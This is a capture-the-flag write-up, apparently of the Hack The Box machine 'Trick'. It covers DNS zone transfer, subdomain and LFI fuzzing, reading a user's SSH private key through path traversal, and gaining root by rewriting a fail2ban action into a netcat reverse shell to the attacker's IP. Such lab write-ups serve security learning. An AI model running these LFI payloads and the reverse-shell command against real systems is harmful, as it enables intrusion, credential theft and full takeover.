Recon
nmap scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
└─$ rustscan -a 10.10.11.166 -b 4000 -- -Pn -sV -A
ssh-hostkey:
| 2048 61:ff:29:3b:36:bd:9d:ac:fb:de:1f:56:88:4c:ae:2d (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5Rh57OmAndXFukHce0Tr4BL8CWC8yACwWdu8VZcBPGuMUH8VkvzqseeC8MYxt5SPL1aJmAsZSgOUreAJNlYNBBKjMoFwyDdArWhqDThlgBf6aqwqMRo3XWIcbQOBkrisgqcPnRKlwh+vqArsj5OAZaUq8zs7Q3elE6HrDnj779JHCc5eba+DR+Cqk1u4JxfC6mGsaNMAXoaRKsAYlwf4Yjhonl6A6MkWszz7t9q5r2bImuYAC0cvgiHJdgLcr0WJh+lV8YIkPyya1vJFp1gN4Pg7I6CmMaiWSMgSem5aVlKmrLMX10MWhewnyuH2ekMFXUKJ8wv4DgifiAIvd6AGR
| 256 9e:cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAoXvyMKuWhQvWx52EFXK9ytX/pGmjZptG8Kb+DOgKcGeBgGPKX3ZpryuGR44av0WnKP0gnRLWk7UCbqY3mxXU0=
| 256 72:93:f9:11:58:de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGY1WZWn9xuvXhfxFFm82J9eRGNYJ9NnfzECUm0faUXm
25/tcp open smtp syn-ack Postfix smtpd
|_smtp-commands: debian.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
53/tcp open domain syn-ack ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
| dns-nsid:
|_ bind.version: 9.11.5-P4-5.1+deb10u7-Debian
80/tcp open http syn-ack nginx 1.14.2
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.2
|_http-title: Coming Soon - Start Bootstrap Theme
Service Info: Host: debian.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel
|
Webserver is using Bootstrap v5.1.3 to create forms.
Dirbuster scan
1
2
3
4
5
6
7
|
Dir found: / - 200
Dir found: /assets/ - 403
Dir found: /css/ - 403
Dir found: /assets/img/ - 403
Dir found: /js/ - 403
File found: /js/scripts.js - 200
Dir found: /assets/mp4/ - 403
|
DNS recon
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
|
└─$ dig ANY @10.10.11.166 trick.htb
; <<>> DiG 9.18.7-1-Debian <<>> ANY @10.10.11.166 trick.htb
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 30133
;; flags: qr aa rd; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 3
;; WARNING: recursion requested but not available
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: 98c92c8f16cf9ce9863233fd6359458171615eae5c50db63 (good)
;; QUESTION SECTION:
;trick.htb. IN ANY
;; ANSWER SECTION:
trick.htb. 604800 IN SOA trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb. 604800 IN NS trick.htb.
trick.htb. 604800 IN A 127.0.0.1
trick.htb. 604800 IN AAAA ::1
;; ADDITIONAL SECTION:
trick.htb. 604800 IN A 127.0.0.1
trick.htb. 604800 IN AAAA ::1
;; Query time: 51 msec
;; SERVER: 10.10.11.166#53(10.10.11.166) (TCP)
;; WHEN: Wed Oct 26 16:34:41 CEST 2022
;; MSG SIZE rcvd: 209
|
We find a SOA record with a new domain: root.trick.htb. Then, I tried to do a DNS Zone Transfert.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
└─$ dig axfr @10.10.11.166 trick.htb
; <<>> DiG 9.18.7-1-Debian <<>> axfr @10.10.11.166 trick.htb
; (1 server found)
;; global options: +cmd
trick.htb. 604800 IN SOA trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb. 604800 IN NS trick.htb.
trick.htb. 604800 IN A 127.0.0.1
trick.htb. 604800 IN AAAA ::1
preprod-payroll.trick.htb. 604800 IN CNAME trick.htb.
trick.htb. 604800 IN SOA trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
;; Query time: 156 msec
;; SERVER: 10.10.11.166#53(10.10.11.166) (TCP)
;; WHEN: Wed Oct 26 21:28:07 CEST 2022
;; XFR size: 6 records (messages 1, bytes 231)
|
We find a new subdomain preprod-payroll.trick.htb.
Browsing to it, we find a login.php page with an authent form. Re-running dirbuster on the new subdomain and we obtain some php pages.
Vulnerability
Trying SQLi
I first tried to bypass the login form with a SQLi. I used the Hacktrick’s login bypass wordlist.
1
|
└─$ ffuf -u http://preprod-payroll.trick.htb/login.php -c -w /usr/share/wordlists/sqli.req -X POST -d 'username=adminFUZZ&password=admin' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8'
|
But it failed.
Fuzzing again
After some trouble, I just realized that the subdomain preprod-payroll.trick.htb is a pre-production domain for the payroll service, there may be some other subdomains.
1
2
3
4
|
└─$ ffuf -w /usr/share/wordlists/subdomains-top1mil.txt -H "Host: preprod-FUZZ.trick.htb" -u http://10.10.11.166 -fs 5480
marketing [Status: 200, Size: 9660, Words: 3007, Lines: 179, Duration: 121ms]
payroll [Status: 302, Size: 9546, Words: 1453, Lines: 267, Duration: 122ms]
|
We find a new subdomain preprod-marketing.trick.htb.
Page browsing on that subdomain is done by the page parameter (http://preprod-marketing.trick.htb/index.php?page=home.html). So it may be vulnerable to LFI.
1
2
|
└─$ ffuf -w /usr/share/seclists/Fuzzing/LFI/LFI-ALL.txt -u "http://preprod-marketing.trick.htb/index.php?page=FUZZ" -fs 0
....//....//....//....//etc/passwd
|
I found multiple working payload.
LFI works !
I first try to get SSH key from users.
1
2
3
4
5
6
7
8
|
GET /index.php?page=....//....//....//....//home/michael/.ssh/id_rsa HTTP/1.1
[...]
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
[...]
IJhaN0D5bVMdjjFHAAAADW1pY2hhZWxAdHJpY2sBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----
|
The user michael has a SSH key, we can now connect into SSH.
1
2
|
michael@trick:~$ cat user.txt
**************************9ff491
|
And get the user flag :)
Path to the privesc
Checking sudo permissions.
1
2
3
4
5
6
|
michael@trick:~$ sudo -l
Matching Defaults entries for michael on trick:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User michael may run the following commands on trick:
(root) NOPASSWD: /etc/init.d/fail2ban restart
|
We have the right to restart the fail2ban service. Looking at the conf files, we see that group security can write on the /etc/fail2ban/action.d directory. And hopefully, michael is on the security group.
1
2
|
michael@trick:/etc/fail2ban$ id
uid=1001(michael) gid=1001(michael) groups=1001(michael),1002(security)
|
I found an interesting article talking about a fail2ban privesc. So now, we have to find a way to edit the iptables-multiport.conf config file to change the actionban entry. As we have the write permission on the directory, we can edit file using sed.
We can replace the actionban entry with a reverse shell command with sed.
1
2
3
4
5
6
7
8
9
10
11
12
|
michael@trick:/etc/fail2ban$ sed -i -E "s\actionban =.*\actionban = /usr/bin/nc 10.10.16.11 4444 -e /usr/bin/bash\g" /etc/fail2ban/action.d/iptables-multiport.conf
michael@trick:/etc/fail2ban$ cat action.d/iptables-multiport.conf
# Option: actionban
# Notes.: command executed when banning an IP. Take care that the
# command is executed with Fail2Ban user rights.
# Tags: See jail.conf(5) man page
# Values: CMD
#
actionban = /usr/bin/nc 10.10.16.11 4444 -e /usr/bin/bash
michael@trick:/etc/fail2ban$ sudo /etc/init.d/fail2ban restart
|
Now, after 5 failed login attempt on the SSH service, the fail2ban service will execute the reverse shell command.
1
2
3
4
5
|
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.11] from (UNKNOWN) [10.10.11.166] 39276
id
uid=0(root) gid=0(root) groups=0(root)
|
We can get the root flag :)
